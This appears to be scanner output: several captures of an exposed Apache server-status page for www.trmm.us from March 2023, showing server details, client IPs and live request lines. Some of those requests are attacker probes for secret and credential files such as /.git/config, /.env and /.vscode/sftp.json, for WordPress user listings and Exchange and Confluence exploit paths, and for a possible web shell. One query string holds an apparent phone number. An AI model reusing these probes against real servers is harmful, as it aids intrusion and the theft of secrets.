0-06270/290/47777_ 36.8011110.06.621091.32 78.128.113.142http/1.1lhsrwdz.com:443GET /wikindex.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt HTTP 0-06270/305/48158_ 36.59137160.07.101141.03 157.90.181.149http/1.1 0-06270/304/48088_ 36.58155740.09.121060.07 127.0.0.1http/1.1 0-06270/300/47925_ 36.63130210.03.08915.10 127.0.0.1http/1.1 0-06270/294/48151_ 36.8292160.06.171150.31 23.59.176.71http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-06270/291/47969_ 36.9219140.06.111000.93 206.174.62.240http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 0-06270/292/47868_ 36.912520.08.981035.16 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-06270/292/47844_ 36.8931170.07.83998.79 72.93.152.110http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 0-06270/308/48016_ 36.8742150.07.051046.57 69.178.48.170http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 0-06270/304/47851_ 36.8556750.06.271080.97 165.254.96.10http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-06270/304/48001_ 36.81101740.08.78992.07 165.254.96.15http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-06270/308/48062_ 36.865020.02.241124.43 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-06270/296/48065_ 36.846700.010.281025.11 78.128.113.142http/1.1lhsrwdz.com:80GET /radio.php HTTP/1.1 0-06270/306/47900_ 36.7415510.06.061035.48 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-0807090/703/45416_ 146.5224770.025.851033.33 23.201.57.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/714/45289_ 146.55000.033.461017.73 165.232.76.155http/1.1trmm.us:80GET /.vscode/sftp.json HTTP/1.1 1-0807090/694/45338_ 146.514100.016.20986.04 78.128.113.142http/1.1lhsrwdz.com:80GET /lock360.php?daksldlkdsadas=1 HTTP/1.1 1-0807090/703/45316_ 146.41123140.025.161058.29 104.28.48.229http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 1-0807090/707/45344_ 146.3023000.024.201065.42 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=30234401910172 H 1-0807090/710/45146_ 146.0553790.025.061075.67 174.215.19.190http/1.1 1-0807090/694/45252_ 146.55010.020.651020.04 165.232.76.155http/1.1trmm.us:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-0807090/698/45048_ 146.4311749170.020.891018.02 104.28.48.229http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0807090/700/45227_ 146.21317200.021.80967.69 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/700/45263_ 146.55000.011.391143.14 165.232.76.155http/1.1localhost:80HELP 1-0807090/687/45389_ 146.4684780.07.881047.28 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/710/45252_ 145.59230160.019.951037.21 127.0.0.1http/1.1 1-0807090/699/45213_ 146.5132720.022.241022.53 23.59.176.70http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/702/45190_ 146.55000.09.741043.34 165.232.76.155http/1.1trmm.us:80GET /v2/_catalog HTTP/1.1 1-0807090/687/45196_ 146.4955117720.024.861070.45 174.215.19.190http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0807090/680/45270_ 146.31222150.028.81943.67 23.59.176.71http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/696/45265_ 146.332021680.018.901032.63 23.59.176.70http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/690/45187_ 146.16352730.020.631082.37 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0736160/567/44110_ 106.59941040.05.79945.74 73.8.249.76http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 2-0736160/557/44120_ 106.5019030.013.051001.92 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-0736160/557/44275_ 106.6813167280.07.051074.92 72.217.25.166http/1.1trmm.us:443POST /s/ HTTP/1.1 2-0736160/559/43956_ 106.401000.011.721001.68 127.0.0.1http/1.1 2-0736160/552/44183_ 106.71000.014.56945.62 96.7.74.175http/1.1trmm.us:443GET /.vscode/sftp.json HTTP/1.1 2-0736160/549/44189_ 106.6358720.014.531012.19 23.77.218.214http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-0736160/574/44212_ 106.6182560.011.41982.81 23.59.176.71http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0736160/554/43909_ 106.6727810.07.41909.02 23.59.176.71http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0736160/555/44098_ 106.23190700.015.59939.38 127.0.0.1http/1.1 2-0736160/550/43943_ 106.4722020.07.22947.16 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-0736160/548/44180_ 106.16220870.014.951005.45 127.0.0.1<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c59708847a1c
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Friday, 24-Mar-2023 15:50:19 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 51 days 21 hours 37 minutes 20 seconds Server load: 0.10 0.18 0.22 Total accesses: 8186128 - Total Traffic: 207.0 GB CPU Usage: u1335.57 s208.27 cu0 cs0 - .0344% CPU load 1.83 requests/sec - 48.4 kB/second - 26.5 kB/request 15 requests currently being processed, 183 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 098730no10yes216044 123840no5yes117021 286508no2yes018002 3109764no2yes018020 4116801no2yes117001 533086no4yes117021 621767no9yes315035 7125209no6yes117032 8115169no0yes018000 943856no2yes018011 10129613no7yes612006 Sum11049 1518301723 ______R___W________________________W____________________________ ______________W__________________W__________R___W__________W___R _______________________________________________________R___R_RR_ _W__R_.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0987300/208/40344_ 17.13020.03.69868.70 96.7.74.175http/1.1 0-0987300/240/40334_ 17.34030.03.86867.77 96.7.74.198http/1.1 0-0987300/256/40552_ 17.48000.02.13988.51 96.7.74.198http/1.1trmm.us:443GET /.git/config HTTP/1.1 0-0987300/218/40514_ 17.340120.01.20854.94 96.7.74.198http/1.1 0-0987300/222/40321_ 17.2801630.01.12924.75 96.7.74.198http/1.1 0-0987300/241/40603_ 17.44000.04.52963.21 96.7.74.198http/1.1 0-0987300/240/40591R 17.270180.04.03887.12 96.7.74.198http/1.1 0-0987300/243/40496_ 17.200110.01.42781.01 96.7.74.198http/1.1 0-0987300/236/40603_ 17.47000.03.94985.85 96.7.74.198http/1.1trmm.us:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0987300/219/40492_ 17.25020.01.23830.90 96.7.74.175http/1.1 0-0987300/243/40326W 17.111300.01.78862.20 173.218.126.144http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0987300/218/40295_ 17.34000.01.11835.96 96.7.74.175http/1.1 0-0987300/212/40500_ 17.48000.01.55867.48 96.7.74.198http/1.1trmm.us:443GET /.vscode/sftp.json HTTP/1.1 0-0987300/232/40368_ 17.48000.01.44907.11 96.7.74.198http/1.1trmm.us:443GET /s/0373e2236313e26333e23323/_/;/META-INF/maven/com.atlassia 0-0987300/223/40485_ 17.44000.01.14854.61 96.7.74.175http/1.1 0-0987300/222/40494_ 17.35000.03.95940.81 96.7.74.198http/1.1 0-0987300/229/40608_ 17.260200.04.05843.93 96.7.74.198http/1.1 0-0987300/211/40448_ 17.44000.04.01869.37 96.7.74.175http/1.1 1-0238400/572/38291_ 101.85000.011.38900.78 96.7.74.175http/1.1trmm.us:443GET /.env HTTP/1.1 1-0238400/568/38079_ 101.610190.07.84873.27 96.7.74.198http/1.1 1-0238400/556/38211_ 101.85000.06.69830.09 96.7.74.175http/1.1trmm.us:443GET /debug/default/view?panel=config HTTP/1.1 1-0238400/555/38140_ 101.830120.08.98911.73 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/560/38206_ 101.54020.011.57932.12 96.7.74.172http/1.1 1-0238400/557/38021_ 101.7215170.07.38887.79 23.35.71.103http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/561/38116_ 101.58000.014.07862.88 96.7.74.198http/1.1 1-0238400/554/37985_ 101.620850.09.89870.97 96.7.74.198http/1.1 1-0238400/556/38061_ 101.55014710.014.24839.78 96.7.74.175http/1.1 1-0238400/555/38086_ 101.530280.013.251003.70 96.7.74.198http/1.1 1-0238400/555/38251_ 101.500120.04.23926.34 96.7.74.198http/1.1 1-0238400/575/38143_ 101.84000.031.07889.47 96.7.74.175http/1.1trmm.us:443GET /v2/_catalog HTTP/1.1 1-0238400/561/38046_ 101.810140.09.68868.67 96.7.74.175http/1.1trmm.us:443GET /server-status HTTP/1.1 1-0238400/564/38123_ 101.46010.09.13900.16 96.7.74.164http/1.1 1-0238400/562/38048_ 101.7220367780.09.13926.43 173.73.196.24http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0238400/564/38170_ 101.6845170.010.31802.25 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/547/38087_ 101.82000.010.46890.34 96.7.74.175http/1.1trmm.us:443GET /debug/default/view?panel=config HTTP/1.1 1-0238400/559/38057W 101.462200.06.08925.07 76.170.153.107http/1.1trmm.us:443POST /s/ HTTP/1.1 2-0865080/184/38921_ 34.100250450.06.42870.80 96.7.74.172http/1.1 2-0865080/186/38923_ 34.29000.013.07881.75 96.7.74.198http/1.1 2-0865080/194/39004_ 34.030180.08.16943.59 96.7.74.198http/1.1 2-0865080/185/38748_ 34.31000.07.62899.51 74.207.237.46http/1.1client.simplismarter.com:443GET /info.php HTTP/1.1 2-0865080/197/38907_ 34.140190.07.15850.79 96.7.74.198http/1.1 2-0865080/190/38922_ 34.20010.01.46910.16 96.7.74.175http/1.1 2-0865080/195/38917_ 33.810140.05.33888.25 96.7.74.198http/1.1 2-0865080/192/38694_ 33.930180.011.97831.82 96.7.74.198http/1.1 2-0865080/193/38920_ 33.640170.04.73823.40 96.7.74.172http/1.1 2-0865080/187/38768_ 34.160140.07.15858.15 96.7.74.198http/1.1 2-0865080/196/38939_ 34.100150.06.96894.75 96.7.74.172http/1.1 2-0865080/194/38873_ 34.20010.04.42923.07 96.7.74.175http/1.1 2-0865080/186/38880_ 34.080269230.02.487031.41 74.207.237.46http/1.1 2-0865080/193/38858_ 33.86000.05.43920.53 96.7.74.164http/1.1 2-0865080/192/38858_ 34.2001360.01.36793.34 96.7.74.175http/1.1 2-0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c59793986804
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Friday, 24-Mar-2023 15:50:19 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 51 days 21 hours 37 minutes 20 seconds Server load: 0.10 0.18 0.22 Total accesses: 8186097 - Total Traffic: 207.0 GB CPU Usage: u1335.02 s208.14 cu0 cs0 - .0344% CPU load 1.83 requests/sec - 48.4 kB/second - 26.5 kB/request 12 requests currently being processed, 186 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 098730no11yes117054 123840no2yes216001 286508no2yes018002 3109764no1yes018010 4116801no2yes117001 533086no2yes216000 621767no10yes414024 7125209no4yes117010 8115169no0yes018000 943856no1yes018001 10129613no8yes117007 Sum11043 121860920 __________W___________________W____W____________________________ ______________W____________R_____W__________R_R_W___________R___ ____________R___________________________________________________ _W____.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0987300/208/40344_ 17.13020.03.69868.70 96.7.74.164http/1.1 0-0987300/240/40334_ 17.34030.03.86867.77 96.7.74.198http/1.1trmm.us:443GET /.git/config HTTP/1.1 0-0987300/255/40551_ 17.34000.02.13988.51 74.207.237.46http/1.1client.simplismarter.com:443GET /.env HTTP/1.1 0-0987300/218/40514_ 17.340120.01.20854.94 74.207.237.46http/1.1client.simplismarter.com:443GET /server-status HTTP/1.1 0-0987300/222/40321_ 17.2801630.01.12924.75 96.7.74.164http/1.1 0-0987300/240/40602_ 17.280880.04.52963.21 96.7.74.172http/1.1 0-0987300/240/40591_ 17.270180.04.03887.12 96.7.74.172http/1.1 0-0987300/243/40496_ 17.200110.01.42781.01 96.7.74.164http/1.1 0-0987300/235/40602_ 17.260190.03.94985.85 96.7.74.172http/1.1 0-0987300/219/40492_ 17.25020.01.23830.90 96.7.74.164http/1.1 0-0987300/243/40326W 17.111300.01.78862.20 173.218.126.144http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0987300/218/40295_ 17.34000.01.11835.96 96.7.74.198http/1.1trmm.us:443GET /.env HTTP/1.1 0-0987300/211/40499_ 17.260200.01.54867.48 96.7.74.172http/1.1 0-0987300/231/40367_ 17.270150.01.44907.10 96.7.74.164http/1.1 0-0987300/222/40484_ 17.260180.01.13854.61 96.7.74.172http/1.1 0-0987300/222/40494_ 17.35000.03.95940.81 195.211.77.140http/1.1trmm.us:443GET / HTTP/1.1 0-0987300/229/40608R 17.260200.04.05843.93 74.207.237.46http/1.1 0-0987300/210/40447_ 17.340160.04.01869.37 74.207.237.46http/1.1client.simplismarter.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-0238400/571/38290_ 101.6845170.011.38900.78 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/568/38079_ 101.6190190.07.84873.27 165.254.96.20http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/555/38210_ 101.6477160.06.69830.09 165.254.96.10http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/554/38139_ 101.5415230.08.97911.73 107.214.74.192http/1.1veew.info:443GET /js/jquery.mask.js HTTP/1.1 1-0238400/560/38206_ 101.5415220.011.57932.12 107.214.74.192http/1.1veew.info:443GET /js/validate-1.2.js HTTP/1.1 1-0238400/557/38021_ 101.7215170.07.38887.79 23.35.71.103http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/561/38116_ 101.5811800.014.07862.88 165.254.96.20http/1.1trmm.us:443GET /public/mms/20230320_191019_UTC_4bfa7d489c_0.png HTTP/1.1 1-0238400/554/37985_ 101.6285850.09.89870.97 165.254.96.10http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/556/38061_ 101.5515014710.014.24839.78 107.214.74.192http/1.1veew.info:443GET /loader.gif HTTP/1.1 1-0238400/555/38086_ 101.53152280.013.251003.70 107.214.74.192http/1.1veew.info:443GET /js/jquery.mobile-1.3.0.min.js HTTP/1.1 1-0238400/555/38251_ 101.50152120.04.23926.34 107.214.74.192http/1.1veew.info:443GET /css/jquery.mobile-1.3.0.min.css HTTP/1.1 1-0238400/574/38142_ 101.6287160.031.07889.47 165.254.96.10http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/560/38045W 101.46000.09.66868.65 96.7.74.175http/1.1trmm.us:443GET /server-status HTTP/1.1 1-0238400/564/38123_ 101.46010.09.13900.16 96.7.74.164http/1.1 1-0238400/562/38048_ 101.7220367780.09.13926.43 173.73.196.24http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0238400/564/38170_ 101.6844170.010.31802.25 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/546/38086_ 101.491538230.010.46890.34 107.214.74.192http/1.1veew.info:443GET /?2jJ&phn=8104344258 HTTP/1.1 1-0238400/559/38057W 101.462100.06.08925.07 76.170.153.107http/1.1trmm.us:443POST /s/ HTTP/1.1 2-0865080/184/38921_ 34.10128250450.06.42870.80 107.214.74.192http/1.1trmm.us:443POST /s/ HTTP/1.1 2-0865080/186/38923_ 34.29000.013.07881.75 143.42.118.45http/1.1client.simplismarter.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-0865080/194/39004_ 34.0365180.08.16943.59 127.0.0.1http/1.1 2-0865080/185/38748_ 34.31000.07.62899.51 74.207.237.46http/1.1client.simplismarter.com:443GET /info.php HTTP/1.1 2-0865080/197/38907_ 34.1492190.07.15850.79 165.254.96.10http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0865080/190/38922_ 34.204810.01.46910.16 96.7.74.198http/1.1crm.sprout.online:443GET /fonts/Montserrat/Montserrat-Medium.otf HTTP/1.1 2-0865080/195/38917_ 33.8157140.05.33888.25 127.0.0.1http/1.1 2-0865080/192/38694_ 33.93132180.011.97831.82 127.0.0.1http/1.1 2-0865080/193/38920_ 33.64112170.04.73823.40 172.58.61.145http/1.1 2-0865080/187/38768_ 34.1683140.07.15858.15 96.7.74.175http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-0865080/196/38939_ 34.10126150.06.96894.75 23.35.71.87http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c5973a6ddab5
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 19-Mar-2023 18:43:50 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 47 days 30 minutes 51 seconds Server load: 0.29 0.24 0.28 Total accesses: 7387915 - Total Traffic: 193.1 GB CPU Usage: u1316.04 s224.2 cu0 cs0 - .0379% CPU load 1.82 requests/sec - 49.8 kB/second - 27.4 kB/request 8 requests currently being processed, 172 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 094294no0yes018000 133238no0yes018000 244513no1yes018001 324544no1yes117010 484393no1yes018001 514674no2yes117002 689957no0yes018000 895856no1yes018010 979743no4yes315004 1051878no5yes315041 Sum10015 8172069 ________________________________________________________________ W_____________________________W_______________________________.. ................_________________________R______RW__________R___ R_R___.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0942940/393/37092_ 70.941361090.06.76797.84 23.220.96.183http/1.1trmm.us:443GET /public/mms/20230310_204239_UTC_defa34a6db_0.PNG HTTP/1.1 0-0942940/385/37029_ 70.989920.08.50798.15 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0942940/375/37236_ 70.87186140.07.57928.34 96.7.74.175http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0942940/391/37228_ 70.8025470.09.38807.02 23.192.164.7http/1.1trmm.us:443GET /m/images/be36db0dba-1658521067042-20220722161755.jpg HTTP/ 0-0942940/398/37063_ 71.0635790.013.18851.26 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/390/37293_ 70.84222160.011.13900.82 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/380/37261_ 70.95120200.05.61834.69 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/388/37223_ 70.85206140.06.27735.12 165.254.96.20http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/394/37271_ 70.5499170.06.83923.96 127.0.0.1http/1.1 0-0942940/384/37209_ 70.78267170.05.45779.60 165.254.96.20http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/367/37033_ 70.77270170.020.63807.41 165.254.96.20http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/392/36997_ 70.5643160.03.99779.30 127.0.0.1http/1.1 0-0942940/374/37200_ 70.74299760.09.90799.94 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/396/37090_ 70.77269150.011.11842.58 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/394/37169_ 70.98101107440.04.80795.02 71.218.187.54http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0942940/384/37222_ 71.053966860.010.20829.78 76.168.201.207http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0942940/393/37352_ 71.0443140.05.42797.46 96.7.74.175http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0942940/383/37178_ 70.662170.012.09822.90 127.0.0.1http/1.1 1-0332380/658/33272_ 197.296190.011.60816.73 23.35.71.87http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0332380/651/33043_ 196.9630600.09.69788.57 135.125.246.110http/1.1localhost:80POST / HTTP/1.1 1-0332380/642/33169_ 196.521251220.012.66760.20 127.0.0.1http/1.1 1-0332380/641/33160_ 196.6430600.010.75799.49 135.125.246.110http/1.1 1-0332380/642/33176_ 196.95315150.017.38826.54 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0332380/628/33037_ 197.32000.014.79803.01 96.7.74.198http/1.1trmm.us:443GET /debug/default/view?panel=config HTTP/1.1 1-0332380/644/33107_ 197.1215100.014.26778.13 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=29026653309894 H 1-0332380/624/32995_ 197.0620820.014.29774.58 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-0332380/642/33061_ 196.721511380.07.54729.36 127.0.0.1http/1.1 1-0332380/631/33107_ 197.1810221130.025.37893.58 174.84.123.196http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0332380/660/33241_ 196.5938510.015.23832.85 51.222.253.18http/1.1 1-0332380/670/33080_ 197.15120270.024.70791.66 96.7.74.175http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0332380/643/32999_ 197.15125120.08.88777.40 96.7.74.175http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 1-0332380/620/33091_ 196.95319140.016.47810.37 23.220.96.151http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 1-0332380/637/33040_ 196.94340160.016.25856.57 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0332380/647/33145_ 197.2089770.012.33732.34 165.254.96.20http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0332380/652/33053_ 196.67207750.010.71792.55 127.0.0.1http/1.1 1-0332380/657/33058_ 196.8833150.06.87852.83 127.0.0.1http/1.1 2-0445130/386/34891_ 63.44100820.07.38796.64 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/385/34983_ 63.4687160.05.02813.19 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/399/35013_ 63.39139180.08.96879.03 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/386/34788_ 63.59000.08.12829.90 104.248.140.11http/1.1trmm.us:80GET /s/135323e2831313e2630323e24333/_/;/META-INF/maven/com.atla 2-0445130/381/34870_ 63.5245720.07.45795.33 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/396/34963_ 63.40129190.06.36843.09 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/384/34937_ 63.38140160.03.55800.93 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/380/34720_ 63.5425160.011.32764.38 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/384/34961_ 63.565800.011.64754.56 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/386/34777_ 63.41115150.09.30803.86 23.205.108.69http/1.1crm.sprout
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597fc9d7760
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 19-Mar-2023 18:43:50 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 47 days 30 minutes 51 seconds Server load: 0.29 0.24 0.28 Total accesses: 7387905 - Total Traffic: 193.1 GB CPU Usage: u1316.01 s224.19 cu0 cs0 - .0379% CPU load 1.82 requests/sec - 49.8 kB/second - 27.4 kB/request 11 requests currently being processed, 169 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 094294no0yes018000 133238no0yes117000 244513no1yes018001 324544no1yes216010 484393no1yes117001 514674no2yes216002 689957no0yes018000 895856no1yes117010 979743no4yes414004 1051878no5yes018041 Sum10015 11169069 _______________________R____________________________________R___ ______R________________R______W____W__________________________.. ................________________R___R__R____R____R______________ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0942940/393/37092_ 70.941361090.06.76797.84 23.220.96.183http/1.1trmm.us:443GET /public/mms/20230310_204239_UTC_defa34a6db_0.PNG HTTP/1.1 0-0942940/385/37029_ 70.989920.08.50798.15 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0942940/375/37236_ 70.87186140.07.57928.34 96.7.74.175http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0942940/391/37228_ 70.8025470.09.38807.02 23.192.164.7http/1.1trmm.us:443GET /m/images/be36db0dba-1658521067042-20220722161755.jpg HTTP/ 0-0942940/398/37063_ 71.0635790.013.18851.26 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/390/37293_ 70.84222160.011.13900.82 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/380/37261_ 70.95120200.05.61834.69 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/388/37223_ 70.85206140.06.27735.12 165.254.96.20http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/394/37271_ 70.5499170.06.83923.96 127.0.0.1http/1.1 0-0942940/384/37209_ 70.78267170.05.45779.60 165.254.96.20http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/367/37033_ 70.77270170.020.63807.41 165.254.96.20http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/392/36997_ 70.5643160.03.99779.30 127.0.0.1http/1.1 0-0942940/374/37200_ 70.74299760.09.90799.94 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/396/37090_ 70.77269150.011.11842.58 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/394/37169_ 70.98101107440.04.80795.02 71.218.187.54http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0942940/384/37222_ 